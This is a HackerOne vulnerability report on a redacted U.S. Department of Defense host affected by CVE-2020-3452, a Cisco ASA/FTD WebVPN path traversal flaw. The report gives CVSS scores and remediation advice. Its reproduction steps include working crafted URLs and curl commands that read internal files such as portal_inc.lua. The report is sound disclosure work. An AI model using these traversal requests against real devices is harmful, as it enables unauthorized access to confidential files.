Lucene search

K
hackeroneSecret_lettersH1:959187
HistoryAug 15, 2020 - 2:08 a.m.

U.S. Dept Of Defense: ███ is vulnerable to CVE-2020-3452 Read-Only Path Traversal Vulnerability

2020-08-1502:08:55
secret_letters
hackerone.com
195

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

5 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

0.975 High

EPSS

Percentile

100.0%

Summary:
████████ is vulnerable to Read-Only Path Traversal Vulnerability as described at https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86

Description:
Get request parameters at the /+CSCOT+/translation-table and the /+CSCOT+/oem-customization are not properly sanitized which allows for reading files within the webroot directory that are not intended to be readable.

According to Cisco:
The vulnerability is due to a lack of proper input validation of URLs in HTTP requests processed by an affected device. An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device.

Step-by-step Reproduction Instructions

In Browser:

  1. Copy and paste into your browser: ███/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=…/"
  2. Note the file being requested to be download. This will be the source code for portal_inc.lua which is not normally accessible.

##In curl:

  1. curl -k “████████/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=…/” to prove you can read internal files such as the /+CSCOE+/portal_inc.lua file.
  2. Various internal files can be read, and some require using the --output command to output the data to a file as shown in step 3.
  3. curl -k “█████████/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/http_auth.html&default-language&lang=…/” --output session.js

Product, Version, and Configuration (If applicable)

AnyConnect SSL VPN -webvpn
Clientless SSL VPN - webvpn

Suggested Mitigation/Remediation Actions

Update the software to the latest version via the Cisco advisory linked above in the Summary.

Impact

An attacker can view arbitrary files within the web services file system on the targeted device that are meant to be internal or confidential. The web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect features.
CVSS Score: Base 7.5
Vector: https://tools.cisco.com/security/center/cvssCalculator.x?version=3.1&vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

5 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

0.975 High

EPSS

Percentile

100.0%